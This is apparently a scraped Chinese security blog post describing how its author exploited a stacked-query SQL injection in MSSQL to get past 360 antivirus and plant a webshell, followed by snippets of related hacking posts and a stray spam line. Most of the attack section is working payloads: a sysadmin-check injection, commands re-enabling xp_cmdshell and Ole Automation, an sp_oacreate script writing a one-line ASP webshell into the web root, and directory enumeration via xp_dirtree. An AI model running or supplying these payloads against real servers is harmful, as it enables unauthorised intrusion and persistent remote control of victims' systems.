<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Mssql繞過360拿到webshell

    VSole2022-08-23 16:09:39

    0x01 存在注入

    https://www.cnblogs.com/zpchcbd/p/12167244.html
    

    通過堆查詢延遲注入,判斷是dbo的權限

    ;if(selectIS_SRVROLEMEMBER('sysadmin'))=1WAITFOR DELAY'0:0:05'--
    

    那么直接通過sqlmap來進行執行命令 --os-shell,發現

    [18:39:23] [INFO] checking if xp_cmdshell extended procedure is available, please wait..xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] Y
    [18:39:25] [WARNING] xp_cmdshell re-enabling failed
    

    通過--sql-shell 來手動開啟

    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
    os-shell> exec master..xp_cmdshell "whoami"
    

    當sqlmap啟動xp_cmdshell組件執行失敗的時候還會嘗試去開啟sp_OACreate,手動執行語句為:

    EXEC sp_configure 'show advanced options', 1;  
    RECONFIGURE WITH OVERRIDE;  EXEC sp_configure 'Ole Automation Procedures', 1;
    RECONFIGURE WITH OVERRIDE;  EXEC sp_configure 'show advanced options', 0;
    

    但是還是發現執行失敗:Command standard output [0]

    0x02 提權

    在之前信息搜集的時候發現開放的端口有

    連接下3389發現確實是有殺毒存在

    所知道的利用xp_cmdshell、spsp_OACreate COM組件之類的進行執行命令都會被殺毒攔截,只能從別的方面下手

    既然是dbo的權限那么也可以嘗試通過差異備份等等的方法來繞過殺毒,這里利用的是存儲過程來寫文件

    declare @o int, @f int, @t int, @ret intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\muma.asp', 1exec @ret = sp_oamethod @f, 'writeline', NULL,'<%execute(request("a"))%>' 
    

    因為這里自己已經讀到了權限dbo的密碼,所以是直接用navicat上直接操作

    execute master..xp_dirtree 'c:'        //列出所有c:\文件和目錄,子目錄 
    execute master..xp_dirtree 'c:',1      //只列c:\文件夾 
    execute master..xp_dirtree 'c:',1,1    //列c:\文件夾加文件
    

    通過以上的操作來尋找目錄的地址,然后通過以上的操作來寫文件就可以了

    后來通過同服旁站的查詢發現另外一個站點上的目錄上文件有報錯,同樣可以發現路徑來嘗試寫到另一個站點上,高權限

    webshellsqlmap
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    服務器的相關信息(真實ip,系統類型,版本,開放端口,WAF等) 網站指紋識別(包括,cms,cdn,證書等),dns記錄 whois信息,姓名,備案,郵箱,電話反查(郵箱丟社工庫,社工準備等) 子域名收集,旁站,C段等 google hacking針對化搜索,pdf文件,中間件版本,弱口令掃描等 掃描網站目錄結構,爆后臺,網站banner,測試文件,備份等敏感文件泄漏等 傳輸協議,通用漏洞,ex
    之前有看到goby反制和松鼠A師傅蟻劍反制的文章,再想到之前寫過sqlmap的shell免殺,覺得思路其實差不多,就寫一篇sqlmap的反制吧。
    介紹幾種利用sql注入獲取系統權限的方法,一是利用outfile函數,另外一種是利用--os-shell。
    介紹幾種利用sql注入獲取系統權限的方法,一是利用outfile函數,另外一種是利用--os-shell。
    ?上整理的?試問題?全,有些 HW ?試的題,已經收集好了,提供給?家。
    Mssql繞過360拿到webshell
    2022-08-23 16:09:39
    通過--sql-shell 來手動開啟EXEC sp_configure 'show advanced options', 1;當sqlmap啟動xp_cmdshell組件執行失敗的時候還會嘗試去開啟sp_OACreate,手動執行語句為:EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;通過以上的操作來尋找目錄的地址,然后通過以上的操作來寫文件就可以了后來通過同服旁站的查詢發現另外一個站點上的目錄上文件有報錯,同樣可以發現路徑來嘗試寫到另一個站點上,高權限
    背景 目標站:發現授權文件,刷新抓包得到一處ajax請求指向了TicketsSellMainHandler.ashx文件存在注入開始踩坑 本來打算通過注入開啟XP_cmdshell提權拿到源碼 進一步進行審計 通過dir命令得到該站絕對路徑發現是中文絕對路徑,這個時候在不考慮powershell上線的方式用echo進行寫馬已經行不通了 mssql調用cmd默認是gb2312編碼,使用sqlmap
    option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27單引號嘗試:存在sql注入sqlmap 走起!跑數據 格式有點問題。獲取到管理員加密后的密碼$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu使用john 來破解john pwd --wordlist=/usr/share/wordlist/rockyou.txt admin/snoopy 登錄后臺3x0:后臺篇在后臺查找一番發現 類似于模板的頁面可以利用模板的信息在結合上面的端口信息沒有ssh應該是從web端進入 webshell?就接著用了4x0:提權篇查看系統的內核版本啟動kali上的apache,把exp上傳到服務器把exp下載到靶機解壓exp授權腳本使用exp報錯不影響使用獲取到root權限5x0:flag獲得
    SQlMAP --os-shell拿下webshell 眾所周知,--os-shell的使用條件較為苛刻,必須滿足: dba權限 網站絕對路徑 php中的gpc為off,php為自動轉義的狀態
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类